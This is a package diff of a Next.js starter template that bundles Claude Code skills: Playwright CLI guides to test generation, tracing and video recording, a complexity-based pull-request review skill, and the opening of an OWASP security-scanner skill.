- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-no-shared-module-state.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/template/.claude/skills/video-downloader/SKILL.md +42 -0
- package/template/.claude/skills/web-design-guidelines/SKILL.md +39 -0
- package/template/.claude/skills/webgpu-threejs-tsl/REFERENCE.md +371 -0
- package/template/.claude/skills/webgpu-threejs-tsl/SKILL.md +93 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/compute-shaders.md +578 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/core-concepts.md +497 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/device-loss.md +359 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/limits-and-features.md +133 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/materials.md +353 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/post-processing.md +515 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/wgsl-integration.md +324 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/basic-setup.js +87 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/custom-material.js +170 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/earth-shader.js +292 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/particle-system.js +259 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/post-processing.js +199 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/compute-shader.js +343 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/webgpu-project.js +276 -0
- package/template/.claude/skills/zoom-out/SKILL.md +7 -0
- package/template/.mcp.json +5 -0
- package/template/.nvmrc +1 -0
- package/template/.prettierignore +25 -0
- package/template/.prettierrc +11 -0
- package/template/.vscode/settings.json +1 -0
- package/template/.vscode/tasks.json.example +85 -0
- package/template/AGENTS.md +37 -0
- package/template/CLAUDE.md +75 -0
- package/template/CONTEXT.md +29 -0
- package/template/DESIGN.md +451 -0
- package/template/README.md +394 -0
- package/template/_gitignore +48 -0
- package/template/components.json +21 -0
- package/template/docker-compose.yml +9 -0
- package/template/docs/business/starter-prompt.md +94 -0
- package/template/docs/technical/ai/streaming.md +520 -0
- package/template/docs/technical/ai/structured-data.md +409 -0
- package/template/docs/technical/betterauth/polar.md +476 -0
- package/template/docs/technical/react-markdown.md +123 -0
- package/template/drizzle/0000_chilly_the_phantom.sql +50 -0
- package/template/drizzle/0001_last_warpath.sql +5 -0
- package/template/drizzle/meta/0000_snapshot.json +326 -0
- package/template/drizzle/meta/0001_snapshot.json +410 -0
- package/template/drizzle/meta/_journal.json +20 -0
- package/template/drizzle.config.ts +10 -0
- package/template/env.example +26 -0
- package/template/eslint.config.mjs +75 -0
- package/template/next-env.d.ts +6 -0
- package/template/next.config.ts +57 -0
- package/template/package.json +79 -0
- package/template/postcss.config.mjs +5 -0
- package/template/public/file.svg +1 -0
- package/template/public/globe.svg +1 -0
- package/template/public/next.svg +1 -0
- package/template/public/vercel.svg +1 -0
- package/template/public/window.svg +1 -0
- package/template/scripts/setup.ts +277 -0
- package/template/skills-lock.json +61 -0
- package/template/specs/ui-polish-responsive/README.md +59 -0
- package/template/specs/ui-polish-responsive/action-required.md +3 -0
- package/template/specs/ui-polish-responsive/requirements.md +53 -0
- package/template/specs/ui-polish-responsive/tasks/task-01-globals-css.md +144 -0
- package/template/specs/ui-polish-responsive/tasks/task-02-layout.md +66 -0
- package/template/specs/ui-polish-responsive/tasks/task-03-site-header.md +79 -0
- package/template/specs/ui-polish-responsive/tasks/task-04-site-footer.md +63 -0
- package/template/specs/ui-polish-responsive/tasks/task-05-home-page.md +215 -0
- package/template/specs/ui-polish-responsive/tasks/task-06-dashboard.md +222 -0
- package/template/specs/ui-polish-responsive/tasks/task-07-chat-page.md +225 -0
- package/template/specs/ui-polish-responsive/tasks/task-08-profile-page.md +192 -0
- package/template/specs/ui-polish-responsive/tasks/task-09-auth-pages.md +97 -0
- package/template/specs/ui-polish-responsive/tasks/task-10-setup-checklist.md +120 -0
- package/template/specs/ui-polish-responsive/tasks/task-11-starter-prompt-modal.md +87 -0
- package/template/src/app/(auth)/forgot-password/page.tsx +35 -0
- package/template/src/app/(auth)/layout.tsx +7 -0
- package/template/src/app/(auth)/login/page.tsx +44 -0
- package/template/src/app/(auth)/register/page.tsx +33 -0
- package/template/src/app/(auth)/reset-password/page.tsx +36 -0
- package/template/src/app/api/auth/[...all]/route.ts +4 -0
- package/template/src/app/api/chat/route.ts +80 -0
- package/template/src/app/api/diagnostics/route.ts +162 -0
- package/template/src/app/chat/error.tsx +46 -0
- package/template/src/app/chat/loading.tsx +42 -0
- package/template/src/app/chat/page.tsx +348 -0
- package/template/src/app/dashboard/loading.tsx +63 -0
- package/template/src/app/dashboard/page.tsx +79 -0
- package/template/src/app/error.tsx +44 -0
- package/template/src/app/favicon.ico +0 -0
- package/template/src/app/globals.css +175 -0
- package/template/src/app/layout.tsx +108 -0
- package/template/src/app/manifest.ts +21 -0
- package/template/src/app/not-found.tsx +28 -0
- package/template/src/app/page.tsx +152 -0
- package/template/src/app/profile/page.tsx +416 -0
- package/template/src/app/robots.ts +16 -0
- package/template/src/app/sitemap.ts +26 -0
- package/template/src/components/auth/forgot-password-form.tsx +83 -0
- package/template/src/components/auth/reset-password-form.tsx +107 -0
- package/template/src/components/auth/sign-in-button.tsx +97 -0
- package/template/src/components/auth/sign-out-button.tsx +31 -0
- package/template/src/components/auth/sign-up-form.tsx +121 -0
- package/template/src/components/auth/user-profile.tsx +91 -0
- package/template/src/components/setup-checklist.tsx +180 -0
- package/template/src/components/site-footer.tsx +24 -0
- package/template/src/components/site-header.tsx +46 -0
- package/template/src/components/starter-prompt-modal.tsx +202 -0
- package/template/src/components/theme-provider.tsx +11 -0
- package/template/src/components/ui/avatar.tsx +52 -0
- package/template/src/components/ui/badge.tsx +35 -0
- package/template/src/components/ui/button.tsx +58 -0
- package/template/src/components/ui/card.tsx +78 -0
- package/template/src/components/ui/dialog.tsx +142 -0
- package/template/src/components/ui/dropdown-menu.tsx +256 -0
- package/template/src/components/ui/github-stars.tsx +53 -0
- package/template/src/components/ui/input.tsx +20 -0
- package/template/src/components/ui/label.tsx +23 -0
- package/template/src/components/ui/mode-toggle.tsx +38 -0
- package/template/src/components/ui/separator.tsx +23 -0
- package/template/src/components/ui/skeleton.tsx +13 -0
- package/template/src/components/ui/sonner.tsx +42 -0
- package/template/src/components/ui/spinner.tsx +21 -0
- package/template/src/components/ui/textarea.tsx +17 -0
- package/template/src/hooks/use-diagnostics.ts +86 -0
- package/template/src/lib/auth-client.ts +16 -0
- package/template/src/lib/auth.ts +25 -0
- package/template/src/lib/db.ts +12 -0
- package/template/src/lib/env.ts +117 -0
- package/template/src/lib/schema.ts +82 -0
- package/template/src/lib/session.ts +48 -0
- package/template/src/lib/storage.ts +225 -0
- package/template/src/lib/utils.ts +6 -0
- package/template/src/proxy.ts +25 -0
- package/template/tsconfig.json +48 -0
|
@@ -0,0 +1,88 @@
|
|
|
1
|
+
# Test Generation
|
|
2
|
+
|
|
3
|
+
Generate Playwright test code automatically as you interact with the browser.
|
|
4
|
+
|
|
5
|
+
## How It Works
|
|
6
|
+
|
|
7
|
+
Every action you perform with `playwright-cli` generates corresponding Playwright TypeScript code.
|
|
8
|
+
This code appears in the output and can be copied directly into your test files.
|
|
9
|
+
|
|
10
|
+
## Example Workflow
|
|
11
|
+
|
|
12
|
+
```bash
|
|
13
|
+
# Start a session
|
|
14
|
+
playwright-cli open https://example.com/login
|
|
15
|
+
|
|
16
|
+
# Take a snapshot to see elements
|
|
17
|
+
playwright-cli snapshot
|
|
18
|
+
# Output shows: e1 [textbox "Email"], e2 [textbox "Password"], e3 [button "Sign In"]
|
|
19
|
+
|
|
20
|
+
# Fill form fields - generates code automatically
|
|
21
|
+
playwright-cli fill e1 "user@example.com"
|
|
22
|
+
# Ran Playwright code:
|
|
23
|
+
# await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
|
|
24
|
+
|
|
25
|
+
playwright-cli fill e2 "password123"
|
|
26
|
+
# Ran Playwright code:
|
|
27
|
+
# await page.getByRole('textbox', { name: 'Password' }).fill('password123');
|
|
28
|
+
|
|
29
|
+
playwright-cli click e3
|
|
30
|
+
# Ran Playwright code:
|
|
31
|
+
# await page.getByRole('button', { name: 'Sign In' }).click();
|
|
32
|
+
```
|
|
33
|
+
|
|
34
|
+
## Building a Test File
|
|
35
|
+
|
|
36
|
+
Collect the generated code into a Playwright test:
|
|
37
|
+
|
|
38
|
+
```typescript
|
|
39
|
+
import { test, expect } from '@playwright/test';
|
|
40
|
+
|
|
41
|
+
test('login flow', async ({ page }) => {
|
|
42
|
+
// Generated code from playwright-cli session:
|
|
43
|
+
await page.goto('https://example.com/login');
|
|
44
|
+
await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
|
|
45
|
+
await page.getByRole('textbox', { name: 'Password' }).fill('password123');
|
|
46
|
+
await page.getByRole('button', { name: 'Sign In' }).click();
|
|
47
|
+
|
|
48
|
+
// Add assertions
|
|
49
|
+
await expect(page).toHaveURL(/.*dashboard/);
|
|
50
|
+
});
|
|
51
|
+
```
|
|
52
|
+
|
|
53
|
+
## Best Practices
|
|
54
|
+
|
|
55
|
+
### 1. Use Semantic Locators
|
|
56
|
+
|
|
57
|
+
The generated code uses role-based locators when possible, which are more resilient:
|
|
58
|
+
|
|
59
|
+
```typescript
|
|
60
|
+
// Generated (good - semantic)
|
|
61
|
+
await page.getByRole('button', { name: 'Submit' }).click();
|
|
62
|
+
|
|
63
|
+
// Avoid (fragile - CSS selectors)
|
|
64
|
+
await page.locator('#submit-btn').click();
|
|
65
|
+
```
|
|
66
|
+
|
|
67
|
+
### 2. Explore Before Recording
|
|
68
|
+
|
|
69
|
+
Take snapshots to understand the page structure before recording actions:
|
|
70
|
+
|
|
71
|
+
```bash
|
|
72
|
+
playwright-cli open https://example.com
|
|
73
|
+
playwright-cli snapshot
|
|
74
|
+
# Review the element structure
|
|
75
|
+
playwright-cli click e5
|
|
76
|
+
```
|
|
77
|
+
|
|
78
|
+
### 3. Add Assertions Manually
|
|
79
|
+
|
|
80
|
+
Generated code captures actions but not assertions. Add expectations in your test:
|
|
81
|
+
|
|
82
|
+
```typescript
|
|
83
|
+
// Generated action
|
|
84
|
+
await page.getByRole('button', { name: 'Submit' }).click();
|
|
85
|
+
|
|
86
|
+
// Manual assertion
|
|
87
|
+
await expect(page.getByText('Success')).toBeVisible();
|
|
88
|
+
```
|
|
@@ -0,0 +1,139 @@
|
|
|
1
|
+
# Tracing
|
|
2
|
+
|
|
3
|
+
Capture detailed execution traces for debugging and analysis. Traces include DOM snapshots, screenshots, network activity, and console logs.
|
|
4
|
+
|
|
5
|
+
## Basic Usage
|
|
6
|
+
|
|
7
|
+
```bash
|
|
8
|
+
# Start trace recording
|
|
9
|
+
playwright-cli tracing-start
|
|
10
|
+
|
|
11
|
+
# Perform actions
|
|
12
|
+
playwright-cli open https://example.com
|
|
13
|
+
playwright-cli click e1
|
|
14
|
+
playwright-cli fill e2 "test"
|
|
15
|
+
|
|
16
|
+
# Stop trace recording
|
|
17
|
+
playwright-cli tracing-stop
|
|
18
|
+
```
|
|
19
|
+
|
|
20
|
+
## Trace Output Files
|
|
21
|
+
|
|
22
|
+
When you start tracing, Playwright creates a `traces/` directory with several files:
|
|
23
|
+
|
|
24
|
+
### `trace-{timestamp}.trace`
|
|
25
|
+
|
|
26
|
+
**Action log** - The main trace file containing:
|
|
27
|
+
- Every action performed (clicks, fills, navigations)
|
|
28
|
+
- DOM snapshots before and after each action
|
|
29
|
+
- Screenshots at each step
|
|
30
|
+
- Timing information
|
|
31
|
+
- Console messages
|
|
32
|
+
- Source locations
|
|
33
|
+
|
|
34
|
+
### `trace-{timestamp}.network`
|
|
35
|
+
|
|
36
|
+
**Network log** - Complete network activity:
|
|
37
|
+
- All HTTP requests and responses
|
|
38
|
+
- Request headers and bodies
|
|
39
|
+
- Response headers and bodies
|
|
40
|
+
- Timing (DNS, connect, TLS, TTFB, download)
|
|
41
|
+
- Resource sizes
|
|
42
|
+
- Failed requests and errors
|
|
43
|
+
|
|
44
|
+
### `resources/`
|
|
45
|
+
|
|
46
|
+
**Resources directory** - Cached resources:
|
|
47
|
+
- Images, fonts, stylesheets, scripts
|
|
48
|
+
- Response bodies for replay
|
|
49
|
+
- Assets needed to reconstruct page state
|
|
50
|
+
|
|
51
|
+
## What Traces Capture
|
|
52
|
+
|
|
53
|
+
| Category | Details |
|
|
54
|
+
|----------|---------|
|
|
55
|
+
| **Actions** | Clicks, fills, hovers, keyboard input, navigations |
|
|
56
|
+
| **DOM** | Full DOM snapshot before/after each action |
|
|
57
|
+
| **Screenshots** | Visual state at each step |
|
|
58
|
+
| **Network** | All requests, responses, headers, bodies, timing |
|
|
59
|
+
| **Console** | All console.log, warn, error messages |
|
|
60
|
+
| **Timing** | Precise timing for each operation |
|
|
61
|
+
|
|
62
|
+
## Use Cases
|
|
63
|
+
|
|
64
|
+
### Debugging Failed Actions
|
|
65
|
+
|
|
66
|
+
```bash
|
|
67
|
+
playwright-cli tracing-start
|
|
68
|
+
playwright-cli open https://app.example.com
|
|
69
|
+
|
|
70
|
+
# This click fails - why?
|
|
71
|
+
playwright-cli click e5
|
|
72
|
+
|
|
73
|
+
playwright-cli tracing-stop
|
|
74
|
+
# Open trace to see DOM state when click was attempted
|
|
75
|
+
```
|
|
76
|
+
|
|
77
|
+
### Analyzing Performance
|
|
78
|
+
|
|
79
|
+
```bash
|
|
80
|
+
playwright-cli tracing-start
|
|
81
|
+
playwright-cli open https://slow-site.com
|
|
82
|
+
playwright-cli tracing-stop
|
|
83
|
+
|
|
84
|
+
# View network waterfall to identify slow resources
|
|
85
|
+
```
|
|
86
|
+
|
|
87
|
+
### Capturing Evidence
|
|
88
|
+
|
|
89
|
+
```bash
|
|
90
|
+
# Record a complete user flow for documentation
|
|
91
|
+
playwright-cli tracing-start
|
|
92
|
+
|
|
93
|
+
playwright-cli open https://app.example.com/checkout
|
|
94
|
+
playwright-cli fill e1 "4111111111111111"
|
|
95
|
+
playwright-cli fill e2 "12/25"
|
|
96
|
+
playwright-cli fill e3 "123"
|
|
97
|
+
playwright-cli click e4
|
|
98
|
+
|
|
99
|
+
playwright-cli tracing-stop
|
|
100
|
+
# Trace shows exact sequence of events
|
|
101
|
+
```
|
|
102
|
+
|
|
103
|
+
## Trace vs Video vs Screenshot
|
|
104
|
+
|
|
105
|
+
| Feature | Trace | Video | Screenshot |
|
|
106
|
+
|---------|-------|-------|------------|
|
|
107
|
+
| **Format** | .trace file | .webm video | .png/.jpeg image |
|
|
108
|
+
| **DOM inspection** | Yes | No | No |
|
|
109
|
+
| **Network details** | Yes | No | No |
|
|
110
|
+
| **Step-by-step replay** | Yes | Continuous | Single frame |
|
|
111
|
+
| **File size** | Medium | Large | Small |
|
|
112
|
+
| **Best for** | Debugging | Demos | Quick capture |
|
|
113
|
+
|
|
114
|
+
## Best Practices
|
|
115
|
+
|
|
116
|
+
### 1. Start Tracing Before the Problem
|
|
117
|
+
|
|
118
|
+
```bash
|
|
119
|
+
# Trace the entire flow, not just the failing step
|
|
120
|
+
playwright-cli tracing-start
|
|
121
|
+
playwright-cli open https://example.com
|
|
122
|
+
# ... all steps leading to the issue ...
|
|
123
|
+
playwright-cli tracing-stop
|
|
124
|
+
```
|
|
125
|
+
|
|
126
|
+
### 2. Clean Up Old Traces
|
|
127
|
+
|
|
128
|
+
Traces can consume significant disk space:
|
|
129
|
+
|
|
130
|
+
```bash
|
|
131
|
+
# Remove traces older than 7 days
|
|
132
|
+
find .playwright-cli/traces -mtime +7 -delete
|
|
133
|
+
```
|
|
134
|
+
|
|
135
|
+
## Limitations
|
|
136
|
+
|
|
137
|
+
- Traces add overhead to automation
|
|
138
|
+
- Large traces can consume significant disk space
|
|
139
|
+
- Some dynamic content may not replay perfectly
|
|
@@ -0,0 +1,143 @@
|
|
|
1
|
+
# Video Recording
|
|
2
|
+
|
|
3
|
+
Capture browser automation sessions as video for debugging, documentation, or verification. Produces WebM (VP8/VP9 codec).
|
|
4
|
+
|
|
5
|
+
## Basic Recording
|
|
6
|
+
|
|
7
|
+
```bash
|
|
8
|
+
# Open browser first
|
|
9
|
+
playwright-cli open
|
|
10
|
+
|
|
11
|
+
# Start recording
|
|
12
|
+
playwright-cli video-start demo.webm
|
|
13
|
+
|
|
14
|
+
# Add a chapter marker for section transitions
|
|
15
|
+
playwright-cli video-chapter "Getting Started" --description="Opening the homepage" --duration=2000
|
|
16
|
+
|
|
17
|
+
# Navigate and perform actions
|
|
18
|
+
playwright-cli goto https://example.com
|
|
19
|
+
playwright-cli snapshot
|
|
20
|
+
playwright-cli click e1
|
|
21
|
+
|
|
22
|
+
# Add another chapter
|
|
23
|
+
playwright-cli video-chapter "Filling Form" --description="Entering test data" --duration=2000
|
|
24
|
+
playwright-cli fill e2 "test input"
|
|
25
|
+
|
|
26
|
+
# Stop and save
|
|
27
|
+
playwright-cli video-stop
|
|
28
|
+
```
|
|
29
|
+
|
|
30
|
+
## Best Practices
|
|
31
|
+
|
|
32
|
+
### 1. Use Descriptive Filenames
|
|
33
|
+
|
|
34
|
+
```bash
|
|
35
|
+
# Include context in filename
|
|
36
|
+
playwright-cli video-start recordings/login-flow-2024-01-15.webm
|
|
37
|
+
playwright-cli video-start recordings/checkout-test-run-42.webm
|
|
38
|
+
```
|
|
39
|
+
|
|
40
|
+
### 2. Record entire hero scripts.
|
|
41
|
+
|
|
42
|
+
When recording a video for the user or as a proof of work, it is best to create a code snippet and execute it with run-code.
|
|
43
|
+
It allows pulling appropriate pauses between the actions and annotating the video. There are new Playwright APIs for that.
|
|
44
|
+
|
|
45
|
+
1) Perform scenario using CLI and take note of all locators and actions. You'll need those locators to request thier bounding boxes for highlight.
|
|
46
|
+
2) Create a file with the intended script for video (below). Use pressSequentially w/ delay for nice typing, make reasonable pauses.
|
|
47
|
+
3) Use playwright-cli run-code --file your-script.js
|
|
48
|
+
|
|
49
|
+
**Important**: Overlays are `pointer-events: none` — they do not interfere with page interactions. You can safely keep sticky overlays visible while clicking, filling, or performing any actions on the page.
|
|
50
|
+
|
|
51
|
+
```js
|
|
52
|
+
async page => {
|
|
53
|
+
await page.screencast.start({ path: 'video.webm', size: { width: 1280, height: 800 } });
|
|
54
|
+
await page.goto('https://demo.playwright.dev/todomvc');
|
|
55
|
+
|
|
56
|
+
// Show a chapter card — blurs the page and shows a dialog.
|
|
57
|
+
// Blocks until duration expires, then auto-removes.
|
|
58
|
+
// Use this for simple use cases, but always feel free to hand-craft your own beautiful
|
|
59
|
+
// overlay via await page.screencast.showOverlay().
|
|
60
|
+
await page.screencast.showChapter('Adding Todo Items', {
|
|
61
|
+
description: 'We will add several items to the todo list.',
|
|
62
|
+
duration: 2000,
|
|
63
|
+
});
|
|
64
|
+
|
|
65
|
+
// Perform action
|
|
66
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).pressSequentially('Walk the dog', { delay: 60 });
|
|
67
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).press('Enter');
|
|
68
|
+
await page.waitForTimeout(1000);
|
|
69
|
+
|
|
70
|
+
// Show next chapter
|
|
71
|
+
await page.screencast.showChapter('Verifying Results', {
|
|
72
|
+
description: 'Checking the item appeared in the list.',
|
|
73
|
+
duration: 2000,
|
|
74
|
+
});
|
|
75
|
+
|
|
76
|
+
// Add a sticky annotation that stays while you perform actions.
|
|
77
|
+
// Overlays are pointer-events: none, so they won't block clicks.
|
|
78
|
+
const annotation = await page.screencast.showOverlay(`
|
|
79
|
+
<div style="position: absolute; top: 8px; right: 8px;
|
|
80
|
+
padding: 6px 12px; background: rgba(0,0,0,0.7);
|
|
81
|
+
border-radius: 8px; font-size: 13px; color: white;">
|
|
82
|
+
✓ Item added successfully
|
|
83
|
+
</div>
|
|
84
|
+
`);
|
|
85
|
+
|
|
86
|
+
// Perform more actions while the annotation is visible
|
|
87
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).pressSequentially('Buy groceries', { delay: 60 });
|
|
88
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).press('Enter');
|
|
89
|
+
await page.waitForTimeout(1500);
|
|
90
|
+
|
|
91
|
+
// Remove the annotation when done
|
|
92
|
+
await annotation.dispose();
|
|
93
|
+
|
|
94
|
+
// You can also highlight relevant locators and provide contextual annotations.
|
|
95
|
+
const bounds = await page.getByText('Walk the dog').boundingBox();
|
|
96
|
+
await page.screencast.showOverlay(`
|
|
97
|
+
<div style="position: absolute;
|
|
98
|
+
top: ${bounds.y}px;
|
|
99
|
+
left: ${bounds.x}px;
|
|
100
|
+
width: ${bounds.width}px;
|
|
101
|
+
height: ${bounds.height}px;
|
|
102
|
+
border: 1px solid red;">
|
|
103
|
+
</div>
|
|
104
|
+
<div style="position: absolute;
|
|
105
|
+
top: ${bounds.y + bounds.height + 5}px;
|
|
106
|
+
left: ${bounds.x + bounds.width / 2}px;
|
|
107
|
+
transform: translateX(-50%);
|
|
108
|
+
padding: 6px;
|
|
109
|
+
background: #808080;
|
|
110
|
+
border-radius: 10px;
|
|
111
|
+
font-size: 14px;
|
|
112
|
+
color: white;">Check it out, it is right above this text
|
|
113
|
+
</div>
|
|
114
|
+
`, { duration: 2000 });
|
|
115
|
+
|
|
116
|
+
await page.screencast.stop();
|
|
117
|
+
}
|
|
118
|
+
```
|
|
119
|
+
|
|
120
|
+
Embrace creativity, overlays are powerful.
|
|
121
|
+
|
|
122
|
+
### Overlay API Summary
|
|
123
|
+
|
|
124
|
+
| Method | Use Case |
|
|
125
|
+
|--------|----------|
|
|
126
|
+
| `page.screencast.showChapter(title, { description?, duration?, styleSheet? })` | Full-screen chapter card with blurred backdrop — ideal for section transitions |
|
|
127
|
+
| `page.screencast.showOverlay(html, { duration? })` | Custom HTML overlay — use for callouts, labels, highlights |
|
|
128
|
+
| `disposable.dispose()` | Remove a sticky overlay added without duration |
|
|
129
|
+
| `page.screencast.hideOverlays()` / `page.screencast.showOverlays()` | Temporarily hide/show all overlays |
|
|
130
|
+
|
|
131
|
+
## Tracing vs Video
|
|
132
|
+
|
|
133
|
+
| Feature | Video | Tracing |
|
|
134
|
+
|---------|-------|---------|
|
|
135
|
+
| Output | WebM file | Trace file (viewable in Trace Viewer) |
|
|
136
|
+
| Shows | Visual recording | DOM snapshots, network, console, actions |
|
|
137
|
+
| Use case | Demos, documentation | Debugging, analysis |
|
|
138
|
+
| Size | Larger | Smaller |
|
|
139
|
+
|
|
140
|
+
## Limitations
|
|
141
|
+
|
|
142
|
+
- Recording adds slight overhead to automation
|
|
143
|
+
- Large recordings can consume significant disk space
|
|
@@ -0,0 +1,97 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: review-pr
|
|
3
|
+
description: >
|
|
4
|
+
Review pull requests with complexity-adaptive depth — spawning deep-dive agents for medium
|
|
5
|
+
and complex PRs. Use this skill when the user says "review this PR", "review PR #123",
|
|
6
|
+
"check this pull request", "give me a code review", or wants feedback on a PR before merging.
|
|
7
|
+
Also use when the user says "/review-pr" or pastes a GitHub PR URL. Requires the GitHub CLI (gh).
|
|
8
|
+
---
|
|
9
|
+
|
|
10
|
+
# Review Pull Request
|
|
11
|
+
|
|
12
|
+
Review pull requests with a depth that matches their complexity. Simple PRs get a direct review; complex PRs get parallel deep-dive agents analyzing security, performance, and architecture.
|
|
13
|
+
|
|
14
|
+
## Arguments
|
|
15
|
+
|
|
16
|
+
The user should provide PR number(s) or URL(s). If none provided, ask for them.
|
|
17
|
+
|
|
18
|
+
## Instructions
|
|
19
|
+
|
|
20
|
+
### Step 1: Retrieve PR Details
|
|
21
|
+
|
|
22
|
+
Use the GitHub CLI to get the full picture:
|
|
23
|
+
|
|
24
|
+
```bash
|
|
25
|
+
gh pr view {pr_number} --json title,body,files,additions,deletions,commits,author,reviews,comments
|
|
26
|
+
gh pr diff {pr_number}
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
### Step 2: Assess Complexity
|
|
30
|
+
|
|
31
|
+
Score the PR based on:
|
|
32
|
+
- Number of files changed
|
|
33
|
+
- Lines added/removed
|
|
34
|
+
- Number of commits
|
|
35
|
+
- Whether changes touch core/architectural files
|
|
36
|
+
|
|
37
|
+
**Simple** (direct review, no agents):
|
|
38
|
+
- 5 or fewer files AND 100 or fewer lines AND single author
|
|
39
|
+
|
|
40
|
+
**Medium** (1-2 deep-dive agents):
|
|
41
|
+
- 6-15 files, OR 100-500 lines, OR 2 contributors
|
|
42
|
+
|
|
43
|
+
**Complex** (up to 3 deep-dive agents):
|
|
44
|
+
- More than 15 files, OR more than 500 lines, OR more than 2 contributors, OR touches core architecture
|
|
45
|
+
|
|
46
|
+
### Step 3: Analyze
|
|
47
|
+
|
|
48
|
+
**For Simple PRs**: review directly — read the diff, check for issues, provide feedback.
|
|
49
|
+
|
|
50
|
+
**For Medium/Complex PRs**: spawn deep-dive agents in parallel using the `Agent` tool with `subagent_type: "deep-dive"`. Each agent gets a focused area:
|
|
51
|
+
|
|
52
|
+
- **Agent 1 — Code Quality**: conventions, patterns, maintainability, test coverage
|
|
53
|
+
- **Agent 2 — Security**: input validation, auth checks, injection risks, data exposure
|
|
54
|
+
- **Agent 3 — Architecture** (Complex only): design patterns, separation of concerns, performance implications, backwards compatibility
|
|
55
|
+
|
|
56
|
+
Each agent receives the PR diff and description and returns a structured review.
|
|
57
|
+
|
|
58
|
+
### Step 4: Vision Alignment
|
|
59
|
+
|
|
60
|
+
Read the project's `README.md` and `CLAUDE.md` to understand the application's purpose. Assess whether the PR aligns with the project's intended direction. Flag significant deviations — not as a blocker, but as a consideration for the reviewer.
|
|
61
|
+
|
|
62
|
+
### Step 5: Safety Assessment
|
|
63
|
+
|
|
64
|
+
Provide an overall assessment:
|
|
65
|
+
- **Safe to merge**: no significant issues found
|
|
66
|
+
- **Merge with caution**: minor issues that should be noted but aren't blocking
|
|
67
|
+
- **Needs changes**: issues that should be fixed before merging
|
|
68
|
+
|
|
69
|
+
Include a risk level (low/medium/high) with justification.
|
|
70
|
+
|
|
71
|
+
### Step 6: Report
|
|
72
|
+
|
|
73
|
+
Structure the review as:
|
|
74
|
+
|
|
75
|
+
```
|
|
76
|
+
## PR Review: #{pr_number} — {title}
|
|
77
|
+
|
|
78
|
+
### Complexity: {Simple|Medium|Complex}
|
|
79
|
+
{Brief justification}
|
|
80
|
+
|
|
81
|
+
### Summary
|
|
82
|
+
{2-3 sentence overview of what the PR does}
|
|
83
|
+
|
|
84
|
+
### Issues Found
|
|
85
|
+
{Grouped by severity: high → medium → low}
|
|
86
|
+
- **{severity}**: {file:line} — {description}
|
|
87
|
+
|
|
88
|
+
### Improvements Suggested
|
|
89
|
+
{Optional improvements ranked by importance and implementation complexity}
|
|
90
|
+
|
|
91
|
+
### Vision Alignment
|
|
92
|
+
{Does this PR align with the project's direction?}
|
|
93
|
+
|
|
94
|
+
### Verdict: {Safe to merge | Merge with caution | Needs changes}
|
|
95
|
+
Risk level: {low|medium|high}
|
|
96
|
+
{Brief justification}
|
|
97
|
+
```
|
|
@@ -0,0 +1,157 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: security-scanner
|
|
3
|
+
description: >-
|
|
4
|
+
Performs comprehensive OWASP Top 10:2025 security vulnerability analysis on any codebase.
|
|
5
|
+
Use this skill whenever the user asks to: review code for security, perform a security audit,
|
|
6
|
+
scan for vulnerabilities, find security issues, improve application security, check for OWASP
|
|
7
|
+
compliance, do a penetration test review, assess security posture, look for security flaws,
|
|
8
|
+
scan for security risks, harden an application, or check code for exploits. Also trigger when
|
|
9
|
+
the user mentions OWASP, CVEs, CWEs, security hardening, vulnerability assessment, or asks
|
|
10
|
+
for a security report — even if they don't explicitly say "security scan." This skill works
|
|
11
|
+
on any codebase in any language (JavaScript, TypeScript, Python, Java, Go, Ruby, C#, PHP, etc.).
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
# Security Scanner — OWASP Top 10:2025
|
|
15
|
+
|
|
16
|
+
Performs a systematic security audit of any codebase against all 10 OWASP 2025 categories. Produces a structured markdown report with severity ratings, code locations, and actionable remediation guidance.
|
|
17
|
+
|
|
18
|
+
## Execution Flow
|
|
19
|
+
|
|
20
|
+
Follow these four steps in order. Do not skip any step.
|
|
21
|
+
|
|
22
|
+
### Step 1: Detect Project Context
|
|
23
|
+
|
|
24
|
+
Determine whether you are working within an existing project or a blank workspace.
|
|
25
|
+
|
|
26
|
+
